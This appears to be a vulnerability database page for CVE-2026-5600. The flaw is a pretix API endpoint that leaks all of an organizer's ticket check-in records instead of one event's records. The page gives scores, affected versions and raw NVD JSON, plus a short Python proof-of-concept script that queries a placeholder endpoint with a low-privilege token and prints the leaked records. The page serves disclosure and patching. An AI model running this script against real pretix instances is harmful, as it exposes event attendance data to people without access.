Security Vulnerability Report
CVE-2026-5600 CVSS 4.3 MEDIUM

CVE-2026-5600

Published: 2026-04-08 13:16:44
Last Modified: 2026-04-24 17:46:15
Source: 655498c3-6ec5-4f0b-aea6-853b334d05a6

Description

A new API endpoint introduced in pretix 2025 that is supposed to return all check-in events of a specific event in fact returns all check-in events belonging to the respective organizer. This allows an API consumer to access information for all other events under the same organizer, even those they should not have access to.

These records contain information on the time and result of every ticket scan as well as the ID of the matched ticket. Example:

{
  "id": 123,
  "successful": true,
  "error_reason": null,
  "error_explanation": null,
  "position": 321,
  "datetime": "2020-08-23T09:00:00+02:00",
  "list": 456,
  "created": "2020-08-23T09:00:00+02:00",
  "auto_checked_in": false,
  "gate": null,
  "device": 1,
  "device_id": 1,
  "type": "entry"
}

An unauthorized user usually has no way to match these IDs (position) back to individual people.

CVSS Details

CVSS Score (NVD, CVSS 3.1, primary)
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
CVSS 4.0 Score (secondary, from source 655498c3-6ec5-4f0b-aea6-853b334d05a6)
5.5 MEDIUM
CVSS 4.0 Vector
CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Weakness
CWE-653

Configurations (Affected Products)

cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:* - VULNERABLE (versions from 2025.10.0 up to, but excluding, 2026.1.2)
cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:* - VULNERABLE (versions from 2026.2.0 up to, but excluding, 2026.2.1)
cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:* - VULNERABLE (versions from 2026.3.0 up to, but excluding, 2026.3.1)
pretix 2025 (the affected ranges end at 2026.1.2, 2026.2.1 and 2026.3.1 respectively)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target API endpoint (conceptual URL based on the vulnerability description).
# The specific endpoint path introduced in pretix 2025 needs to be substituted here.
target_url = "https://target-pretix-instance/api/v1/organizers/{organizer_slug}/all_checkin_events/"

# Authorization header with a low-privilege token for a specific event
headers = {
    "Authorization": "Token <LOW_PRIVILEGE_API_TOKEN>",
    "Accept": "application/json",
}


def exploit_cve_2026_5600(organizer_slug):
    """
    PoC to demonstrate information disclosure in pretix 2025.
    Attempts to retrieve all check-in events for the organizer.
    """
    print(f"[*] Attempting to access all check-in events for organizer: {organizer_slug}")
    try:
        # Send request to the vulnerable endpoint (timeout added so the call cannot hang)
        response = requests.get(
            target_url.format(organizer_slug=organizer_slug),
            headers=headers,
            timeout=30,
        )
        if response.status_code == 200:
            data = response.json()
            print("[+] Request successful. Data retrieved.")
            # Iterate through the results to verify data leakage
            results = data.get("results", [])
            print(f"[+] Total records leaked: {len(results)}")
            # Display a sample record structure
            if results:
                print("[+] Sample record structure:")
                print(results[0])
            else:
                print("[-] No records found or empty response.")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except Exception as e:
        print(f"[!] An error occurred: {str(e)}")


# Example usage
# exploit_cve_2026_5600("example-organizer")

References

https://pretix.eu/about/en/blog/20260408-release-2026-3-1/ (Vendor Advisory: pretix 2026.3.1 release notes)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-5600", "sourceIdentifier": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "published": "2026-04-08T13:16:43.543", "lastModified": "2026-04-24T17:46:14.777", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A new API endpoint introduced in pretix 2025 that is supposed to \nreturn all check-in events of a specific event in fact returns all \ncheck-in events belonging to the respective organizer. This allows an \nAPI consumer to access information for all other events under the same \norganizer, even those they should not have access to.\n\n\nThese records contain information on the time and result of every ticket scan as well as the ID of the matched ticket. Example:\n\n\n{\n \"id\": 123,\n \"successful\": true,\n \"error_reason\": null,\n \"error_explanation\": null,\n \"position\": 321,\n \"datetime\": \"2020-08-23T09:00:00+02:00\",\n \"list\": 456,\n \"created\": \"2020-08-23T09:00:00+02:00\",\n \"auto_checked_in\": false,\n \"gate\": null,\n \"device\": 1,\n \"device_id\": 1,\n \"type\": \"entry\"\n}\n\n\n\nAn unauthorized user usually has no way to match these IDs (position) back to individual people."}], "metrics": {"cvssMetricV40": [{"source": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:H/UI:N/VC:L/VI:N/VA:N/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "HIGH", "subIntegrityImpact": "HIGH", "subAvailabilityImpact": "HIGH", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": 
"NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-653"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:*", "versionStartIncluding": "2025.10.0", "versionEndExcluding": "2026.1.2", "matchCriteriaId": "467C4FAB-6446-4716-9C03-7AC9B72ECF58"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:*", "versionStartIncluding": "2026.2.0", "versionEndExcluding": "2026.2.1", "matchCriteriaId": "7BFC10B5-5C62-4E2B-A387-9AB3F5A06F75"}, {"vulnerable": true, "criteria": "cpe:2.3:a:pretix:pretix:*:*:*:*:*:*:*:*", "versionStartIncluding": "2026.3.0", 
"versionEndExcluding": "2026.3.1", "matchCriteriaId": "8DBC4AF8-B234-4ACB-BB04-06CC103DFF47"}]}]}], "references": [{"url": "https://pretix.eu/about/en/blog/20260408-release-2026-3-1/", "source": "655498c3-6ec5-4f0b-aea6-853b334d05a6", "tags": ["Vendor Advisory"]}]}}